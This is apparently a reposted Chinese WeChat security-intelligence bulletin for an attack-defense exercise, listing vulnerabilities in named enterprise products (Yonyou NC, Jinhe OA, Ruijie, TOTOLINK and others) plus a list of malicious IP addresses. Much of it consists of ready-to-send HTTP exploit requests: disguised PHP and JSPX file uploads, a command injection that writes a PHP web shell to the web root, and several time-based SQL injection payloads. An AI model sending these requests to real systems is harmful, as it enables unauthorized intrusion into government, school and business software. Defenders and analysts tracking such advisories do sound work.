POST /api/uploader/uploadImage HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="11.php"
Content-Type: image/gif
111
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
用友NC querygoodsgridbycode SQL注入漏洞
TOTOlink A6000R 命令执行漏洞(CVE-2024-41319)
金和OAC6GeneralXmlhttpPage.aspx SQL注入漏洞
GET
/C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralxmlhttpPage.aspx/?id
=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4
HTTP/1.1
Host:
红海云eHRkqFile.mob 任意文件上传
POST/RedseaPlatform/kqFile.mob?method=uploadFile&fileName=123.jspx
HTTP/1.1
Host:
Pragma:no-cache
Cache-Control:no-cache
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/126.0.0.0Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:JSE
Connection:close
Content-Type:multipart/form-data;
boundary=----WebKitformBoundaryS7jL1beJUXUUnhE8
Content-Length:480------WebKitformBoundaryS7jL1beJUXUUnhE8
Content-Disposition:form-data;name="fj_file";filename=|$|"222.jpg"|$|
<jsp:rootversion="2.0"xmlns:jsp="http://java.sun.com/JSP/Page">
<jsp:directive.pagecontentType="text/html"/>
<jsp:directive.pagepageEncoding="UTF-8"/>
jsp:scriptlet<![CDATA[
out.print(123456);
]]></jsp:scriptlet>
</jsp:root>------WebKitformBoundaryS7jL1beJUXUUnhE8--
锐捷统一上网行为管理与审计系统static_convert.php命令注入漏洞
GET/view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27<?php%20sy
stem("id");unlink(__FILE__);?>%27%20>/var/www/html/rce.phpHTTP/1.1
Host:your-ip
Accept:application/json,text/javascript,*/*
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/122.0.0.0Safari/537.36
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
数字通云平台智慧政务 timeSQL注入漏洞
GET/payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655
+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29HTTP/1.1
Host:
Accept-Encoding:gzip,deflate
Connection:keep-alive
飞讯云 WMS/MyDown/MyImportData 前台SQL注入
GET/MyDown/MyImportData?opeid=72000301'HTTP/1.1
Host:
Pragma:no-cache
Cache-Control:no-cache
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/126.0.0.0Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:JSESSID
Language=zh-CN
Connection:close
飞讯云 WMS /MyDown/MyImportData 前台SQL注入,已存在,待披露
【预警】某信服VPN多个0day漏洞
今日,外界流传某信服VPN存在三个0day漏洞,目前暂未披露,请直接联系官方确认
金和OA C6 DownLoadBglmage 未授权 任意文件读取漏洞
金和OA UploadFileDownLoadnew 未授权 任意文件读取漏洞
金慧-综合管理信息系统-sql注入
科讯校园一卡通管理系统 dormitoryHealthRanking SQL注入漏洞
GET/api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
用友时空 PreviewKPQT sql注入漏洞
用友NC LoggingConfigServlet 反序列化漏洞
泛微e-cology getFileViewUrl SSRF漏洞
湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞
科荣AIO moffice 存在SQL注入漏洞
华磊科技物流modifyInsurance存在sql注入漏洞
GET/modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
0725恶意IP威胁情报
60.163.11.198
60.174.26.232
170.106.115.173
223.104.38.57
220.180.66.213
223.247.61.67
220.180.67.232
121.226.83.81
87.236.176.111
87.236.176.107
8.210.16.247
60.205.190.28
39.105.124.82
167.71.58.10
80.230.158.16
103.40.103.136
43.250.173.243
36.151.55.82
154.38.91.159
43.250.173.241
103.3.83.133
43.250.173.94
45.132.237.148
63.141.240.250
120.85.114.81
103.68.195.58
150.109.13.165
120.26.54.108
150.185.5.5
65.49.20.81
180.101.88.201
91.92.242.152
52.230.152.146
218.92.0.56
91.203.177.71
139.59.31.108
--来自互联网
原文始发于微信公众号(飓风网络安全):7.25hvv情报
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论